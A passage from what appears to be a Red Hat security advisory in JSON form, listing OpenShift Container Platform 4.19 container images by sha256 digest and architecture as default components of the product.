"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
